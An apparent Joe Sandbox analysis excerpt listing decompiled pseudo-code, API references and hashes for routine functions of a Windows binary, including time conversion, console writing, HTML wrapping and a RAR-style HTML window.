Opcode ID: 07b13e0309a0b35b3fbc1ae84541c5662d3cd6478879b8556e120718c5c38ea5
Instruction ID: 7793a94f97921970f8e1405bec0c7ea0f24cd500db65778c11492a437c184195
Opcode Fuzzy Hash: 07b13e0309a0b35b3fbc1ae84541c5662d3cd6478879b8556e120718c5c38ea5
Instruction Fuzzy Hash: C5F0F4769046003EC61273767D0AB3B2AAA9BC1765B7D2027F91DF22A3EE218C058314

Uniqueness

Uniqueness Score: -1.00%

Function 00E70D5A Relevance: 12.1, APIs: 8, Instructions: 115
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E70D5A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E00E7EBB0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E00E6AEE5() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0xe9e084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E00E70EC7(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E00E7EC20( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}

0x00e70d5a
0x00e70d61
0x00e70d72
0x00e70d76
0x00e70d84
0x00e70da2
0x00e70db3
0x00e70dc3
0x00e70dd3
0x00e70de5
0x00e70ded
0x00e70df3
0x00e70df9
0x00e70dfd
0x00e70dff
0x00e70d86
0x00e70d90
0x00e70d90
0x00e70e0d
0x00e70e13
0x00e70e1e
0x00e70e1f
0x00e70e24
0x00e70e29
0x00e70e2e
0x00e70e36
0x00e70e3e
0x00e70e46
0x00e70e4c
0x00e70e4e
0x00e70e51
0x00e70e54
0x00e70e59
0x00e70e5d
0x00e70e62
0x00e70e63
0x00e70e6a
0x00e70e6d
0x00e70e70
0x00e70e73
0x00e70e76
0x00000000
0x00000000
0x00000000
0x00e70e76
0x00e70e78
0x00e70e78
0x00e70e80
0x00e70e8c
0x00e70e8c
0x00e70e9b
0x00e70ea1
0x00e70eaa

APIs

__aulldiv.LIBCMT ref: 00E70D6D

Part of subcall function 00E6AEE5: GetVersionExW.KERNEL32(?), ref: 00E6AF0A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00E70D90
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00E70DA2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E70DB3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E70DC3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E70DD3
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E70E0D
__aullrem.LIBCMT ref: 00E70E9B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: acac8cd2158492c92008c3931ac77c22c6efae838890984b5784482ac69cad00
Instruction ID: 39ca9327611b990c5bb2c008017e5f24261a75d23fc796faaa36b5174d42bd2d
Opcode Fuzzy Hash: acac8cd2158492c92008c3931ac77c22c6efae838890984b5784482ac69cad00
Instruction Fuzzy Hash: 8541F7B54083059FC714DF65C88096BBBF8FB88714F009E2FF596A2250E735E549CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E8F0FD Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00E8F0FD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xec1298 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xec1298 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00E8A237(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xec1298 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xec1298 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xec1298 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00E88DDF( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00E88DDF();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00E7EEFA(_v8 ^ _t136);
			}

0x00e8f105
0x00e8f10c
0x00e8f10f
0x00e8f117
0x00e8f11b
0x00e8f127
0x00e8f12a
0x00e8f12d
0x00e8f134
0x00e8f13c
0x00e8f13f
0x00e8f145
0x00e8f14b
0x00e8f150
0x00e8f152
0x00e8f155
0x00e8f15a
0x00e8f164
0x00e8f16b
0x00e8f16e
0x00e8f175
0x00e8f17c
0x00e8f1a8
0x00e8f1ce
0x00e8f1d0
0x00000000
0x00e8f1aa
0x00e8f1ad
0x00e8f274
0x00e8f280
0x00e8f28b
0x00e8f290
0x00e8f1b3
0x00e8f1ba
0x00e8f1bf
0x00e8f1c5
0x00e8f1cb
0x00000000
0x00e8f1cb
0x00e8f1c5
0x00e8f1ad
0x00e8f17e
0x00e8f182
0x00e8f185
0x00e8f18b
0x00e8f18d
0x00e8f190
0x00e8f194
0x00e8f1d1
0x00e8f1d4
0x00e8f1d5
0x00e8f1da
0x00e8f1e0
0x00e8f1e6
0x00e8f1f5
0x00e8f1fb
0x00e8f201
0x00e8f206
0x00e8f222
0x00e8f295
0x00e8f29b
0x00e8f224
0x00e8f224
0x00e8f22c
0x00e8f235
0x00e8f23b
0x00000000
0x00e8f23d
0x00e8f23f
0x00e8f242
0x00e8f25b
0x00000000
0x00e8f25d
0x00e8f261
0x00e8f263
0x00e8f266
0x00000000
0x00e8f266
0x00e8f261
0x00e8f25b
0x00e8f23b
0x00e8f235
0x00e8f222
0x00e8f206
0x00e8f1e0
0x00000000
0x00e8f269
0x00e8f269
0x00e8f29d
0x00e8f2af

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E8F872,00000000,00000000,00000000,00000000,00000000,00E84D0F), ref: 00E8F13F
__fassign.LIBCMT ref: 00E8F1BA
__fassign.LIBCMT ref: 00E8F1D5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E8F1FB
WriteFile.KERNEL32(?,00000000,00000000,00E8F872,00000000,?,?,?,?,?,?,?,?,?,00E8F872,00000000), ref: 00E8F21A
WriteFile.KERNEL32(?,00000000,00000001,00E8F872,00000000,?,?,?,?,?,?,?,?,?,00E8F872,00000000), ref: 00E8F253

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 63ff0e6c6f7aabd574d82424fb8d1cb957e602f5ba80cb1619eb8320b15e99bb
Instruction ID: 479a1d9b0eeecd21baa1051f2df307daeddc42a278b00a6741f26297464b2470
Opcode Fuzzy Hash: 63ff0e6c6f7aabd574d82424fb8d1cb957e602f5ba80cb1619eb8320b15e99bb
Instruction Fuzzy Hash: 0251B474A002499FDB10DFA8DC85EEEBBF8EF09300F14556AE959F72A2D7309945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E790A2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E790A2(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00E78F4A(_t62);
				_push(0x200 + E00E83883(_t62) * 2);
				_t24 = E00E838A3(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E00E85AD6(_t66, L"<html>");
				E00E87458(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00E87458(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E00E71AE6(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00E87458(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00E87458(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00E792E5(_t60, _t82);
					}
					_t72 = 9 + E00E83883(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L00E8389E(_t66);
					_t24 =  *0xec217c(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00E78F81( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0xe93260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}

0x00e790a2
0x00e790a2
0x00e790a6
0x00e790ac
0x00e791f3
0x00e791f3
0x00e790b2
0x00e790b9
0x00e790c4
0x00e790d4
0x00e790d5
0x00e790da
0x00e790e0
0x00e791ed
0x00000000
0x00e791ee
0x00e790ed
0x00e790f8
0x00e79103
0x00e79108
0x00e7910b
0x00e7910f
0x00e79113
0x00e7911e
0x00e79126
0x00e7912d
0x00e7912f
0x00e79131
0x00e79135
0x00e79137
0x00e79137
0x00e7913c
0x00e79148
0x00e79150
0x00e79156
0x00e79157
0x00e7915c
0x00e7915e
0x00e79166
0x00e79166
0x00e79172
0x00e7917e
0x00e79182
0x00e7918c
0x00e791a1
0x00e791ae
0x00e791a3
0x00e791a3
0x00e791a8
0x00e791a8
0x00e791a1
0x00e791b2
0x00e791c0
0x00e791c9
0x00e791d4
0x00e791d9
0x00e791e5
0x00e791eb
0x00e791eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00e79115
0x00e79115
0x00e79115
0x00e79118
0x00e79118
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00E79178
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E79199

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00E790F2
<html>, xrefs: 00E790E7, 00E79120
</html>, xrefs: 00E7914A
utf-8"></head>, xrefs: 00E790FD

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: b2b136afafdf4ed7c3d03b41531c6166d4c43a31e4744712134d197c3964674d
Instruction ID: 7bdff08c5d532ac8919de6d70dfdcb83b5adc12a07255ee168c56e09c639f467
Opcode Fuzzy Hash: b2b136afafdf4ed7c3d03b41531c6166d4c43a31e4744712134d197c3964674d
Instruction Fuzzy Hash: BD316A325493137BD724BB709C4AF6B7B9CDF41714F15901AF81CB61C2EF649A0983A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E79878 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00E79878(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HWND__* _t44;
				intOrPtr* _t52;
				void* _t60;
				WCHAR* _t67;
				struct HWND__* _t68;

				_t68 = _a8;
				_t52 = __ecx;
				 *(__ecx + 8) = _t68;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t68, 0);
				E00E79594(_t52, _a4);
				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
					L00E8389E( *((intOrPtr*)(_t52 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t33 = E00E873F7(_t52, _t60);
				} else {
					_t33 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
				if(_a16 != 0) {
					_push(_a16);
					_t34 = E00E873F7(_t52, _t60);
				} else {
					_t34 = 0;
				}
				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
				GetWindowRect(_t68,  &_v16);
				 *0xec210c(0,  *0xec2158(_t68,  &_v16, 2));
				if( *(_t52 + 4) != 0) {
					 *0xec2114( *(_t52 + 4));
				}
				_t40 = _v36;
				_t20 = _t40 + 1; // 0x1
				_t44 =  *0xec211c(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xec2158(_t68, 0,  *_t52, _t52, _t60));
				 *(_t52 + 4) = _t44;
				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
					__eflags = _t44;
					if(_t44 != 0) {
						ShowWindow(_t44, 5);
						return  *0xec2110( *(_t52 + 4));
					}
				} else {
					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
							_t44 = E00E7968C(_t52, _t78,  *((intOrPtr*)(_t52 + 0x1c)));
							_t67 = _t44;
							if(_t67 != 0) {
								ShowWindow(_t68, 5);
								SetWindowTextW(_t68, _t67);
								return L00E8389E(_t67);
							}
						}
					}
				}
				return _t44;
			}

0x00e79881
0x00e79885
0x00e7988b
0x00e7988e
0x00e79891
0x00e7989d
0x00e798a6
0x00e798ab
0x00e798b0
0x00e798b6
0x00e798bc
0x00e798c0
0x00e798b8
0x00e798b8
0x00e798b8
0x00e798cb
0x00e798ce
0x00e798d4
0x00e798d8
0x00e798d0
0x00e798d0
0x00e798d0
0x00e798de
0x00e798e7
0x00e798fe
0x00e79908
0x00e7990d
0x00e7990d
0x00e79913
0x00e79921
0x00e7994e
0x00e79954
0x00e7995b
0x00e79995
0x00e79997
0x00e7999c
0x00000000
0x00e799a5
0x00e7995d
0x00e7995f
0x00e79966
0x00e79969
0x00e79970
0x00e79975
0x00e79979
0x00e7997e
0x00e79986
0x00000000
0x00e79992
0x00e79979
0x00e79969
0x00e7995f
0x00e799b1

APIs

ShowWindow.USER32(?,00000000), ref: 00E79891
GetWindowRect.USER32(?,00000000), ref: 00E798E7
ShowWindow.USER32(?,00000005,00000000), ref: 00E7997E
SetWindowTextW.USER32(?,00000000), ref: 00E79986
ShowWindow.USER32(00000000,00000005), ref: 00E7999C

Strings

RarHtmlClassName, xrefs: 00E79948

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 5711269424022fc91af593215240666131c65588432730d6132c02850151aebd
Instruction ID: 02e3731546c4353054e16388f1fbdfef21b3ae570e40cf7f595b6c995ecffc00
Opcode Fuzzy Hash: 5711269424022fc91af593215240666131c65588432730d6132c02850151aebd
Instruction Fuzzy Hash: 8A419C31005300AFEB21AF66DC48F5B7BA8EF89704F08856DFA4DBA156CB31D805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E8C314 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E8C314(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00E8C2D8(_t45, 7);
					E00E8C2D8(_t45 + 0x1c, 7);
					E00E8C2D8(_t45 + 0x38, 0xc);
					E00E8C2D8(_t45 + 0x68, 0xc);
					E00E8C2D8(_t45 + 0x98, 2);
					E00E887FE( *((intOrPtr*)(_t45 + 0xa0)));
					E00E887FE( *((intOrPtr*)(_t45 + 0xa4)));
					E00E887FE( *((intOrPtr*)(_t45 + 0xa8)));
					E00E8C2D8(_t45 + 0xb4, 7);
					E00E8C2D8(_t45 + 0xd0, 7);
					E00E8C2D8(_t45 + 0xec, 0xc);
					E00E8C2D8(_t45 + 0x11c, 0xc);
					E00E8C2D8(_t45 + 0x14c, 2);
					E00E887FE( *((intOrPtr*)(_t45 + 0x154)));
					E00E887FE( *((intOrPtr*)(_t45 + 0x158)));
					E00E887FE( *((intOrPtr*)(_t45 + 0x15c)));
					return E00E887FE( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00e8c31a
0x00e8c31f
0x00e8c328
0x00e8c333
0x00e8c33e
0x00e8c349
0x00e8c357
0x00e8c362
0x00e8c36d
0x00e8c378
0x00e8c386
0x00e8c394
0x00e8c3a5
0x00e8c3b3
0x00e8c3c1
0x00e8c3cc
0x00e8c3d7
0x00e8c3e2
0x00000000
0x00e8c3f2
0x00e8c3f7

APIs

Part of subcall function 00E8C2D8: _free.LIBCMT ref: 00E8C301

_free.LIBCMT ref: 00E8C362

Part of subcall function 00E887FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?), ref: 00E88814
Part of subcall function 00E887FE: GetLastError.KERNEL32(?,?,00E8C306,?,00000000,?,00000000,?,00E8C32D,?,00000007,?,?,00E8C72A,?,?), ref: 00E88826

_free.LIBCMT ref: 00E8C36D
_free.LIBCMT ref: 00E8C378
_free.LIBCMT ref: 00E8C3CC
_free.LIBCMT ref: 00E8C3D7
_free.LIBCMT ref: 00E8C3E2
_free.LIBCMT ref: 00E8C3ED

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b4869a11d69ac16d31ffc0356dc65cdab29eeda7956d265d3493ae357e3f0567
Instruction ID: 7c770afa93b7be0fb814c12b63327e02078d83e06d81e4e1a3f26816e2ec3ce8
Opcode Fuzzy Hash: b4869a11d69ac16d31ffc0356dc65cdab29eeda7956d265d3493ae357e3f0567
Instruction Fuzzy Hash: 80118C32580B08BAD521BBB1CD46FCB77ECAF01304F901D15B69DBA4A2DE35A80147A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8236A Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00E8236A(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xe9e680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00E835DB(__eflags,  *0xe9e680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00E83615(__eflags,  *0xe9e680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00E888C9(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00E83615(__eflags,  *0xe9e680, 0);
								} else {
									__eflags = E00E83615(__eflags,  *0xe9e680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00E887FE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x00e82371
0x00e82384
0x00e8238b
0x00e8238e
0x00e82391
0x00e823aa
0x00e823aa
0x00e82393
0x00e82393
0x00e82395
0x00e8239f
0x00e823a5
0x00e823a6
0x00e823a8
0x00e823b8
0x00e823bc
0x00e823be
0x00e823d2
0x00e823d2
0x00e823db
0x00e823c0
0x00e823ce
0x00e823d0
0x00e823e4
0x00e823e6
0x00e823e6
0x00000000
0x00000000
0x00000000
0x00e823d0
0x00e823e9
0x00000000
0x00000000
0x00000000
0x00e823a8
0x00e82395
0x00e823f1
0x00e823fb
0x00e82373
0x00e82375
0x00e82375

APIs

